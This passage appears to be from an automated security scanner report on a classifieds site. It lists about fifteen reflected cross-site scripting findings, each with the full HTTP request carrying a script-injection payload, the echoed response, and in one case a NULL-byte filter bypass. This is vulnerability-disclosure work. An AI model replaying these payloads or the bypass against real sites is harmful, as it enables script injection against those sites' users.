Path:   /housing-sale-foreclosure/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772a4"><script>alert(1)</script>0863b3ad0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1&mobile=1" rel="nofollow">
...[SNIP]...

1.57. http://classifieds.lycos.com/housing-sale-home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd118"><script>alert(1)</script>76c0f84d788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/?mobile=1" rel="nofollow">
...[SNIP]...

1.58. http://classifieds.lycos.com/housing-sale-home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e07"><script>alert(1)</script>bba54ed9fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.59. http://classifieds.lycos.com/housing-sale-land/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-land/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c48"><script>alert(1)</script>602a02817cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.60. http://classifieds.lycos.com/housing-sale-land/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-land/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef73"><script>alert(1)</script>1760df3c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1&mobile=1" rel="nofollow">
...[SNIP]...

1.61. http://classifieds.lycos.com/housing-sale-multi_family/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-multi_family/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84f1e"><script>alert(1)</script>ea2f165b766 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/?mobile=1" rel="nofollow">
...[SNIP]...

1.62. http://classifieds.lycos.com/housing-sale-multi_family/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-multi_family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657fc"><script>alert(1)</script>e72cbec7713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1&mobile=1" rel="nofollow">
...[SNIP]...

1.63. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81eda"><script>alert(1)</script>7114e62b448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:51:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/?mobile=1" rel="nofollow">
...[SNIP]...

1.64. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430ae"><script>alert(1)</script>1f3a5663ade was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/?mobile=1" rel="nofollow">
...[SNIP]...

1.65. http://classifieds.lycos.com/housing-sale-vacation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a23ee"><script>alert(1)</script>c8f63f04749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1&mobile=1" rel="nofollow">
...[SNIP]...

1.66. http://classifieds.lycos.com/housing-sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 614c4"><script>alert(1)</script>eedf9505edd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale614c4"><script>alert(1)</script>eedf9505edd/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale614c4"><script>alert(1)</script>eedf9505edd/?mobile=1" rel="nofollow">
...[SNIP]...

1.67. http://classifieds.lycos.com/housing-sale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bb2"><script>alert(1)</script>fe77791765c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.68. http://classifieds.lycos.com/job-admin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-admin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32400"><script>alert(1)</script>ad6e471f8c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-admin32400"><script>alert(1)</script>ad6e471f8c3/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-admin32400"><script>alert(1)</script>ad6e471f8c3/?mobile=1" rel="nofollow">
...[SNIP]...

1.69. http://classifieds.lycos.com/job-admin/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-admin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5521"><script>alert(1)</script>af69a726549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-admin/?a5521"><script>alert(1)</script>af69a726549=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-admin/?a5521"><script>alert(1)</script>af69a726549=1&mobile=1" rel="nofollow">
...[SNIP]...

1.70. http://classifieds.lycos.com/job-advertising/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-advertising/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e88"><script>alert(1)</script>8045ffbcb07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/?mobile=1" rel="nofollow">
...[SNIP]...

1.71. http://classifieds.lycos.com/job-advertising/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-advertising/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde33"><script>alert(1)</script>b78103d674b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
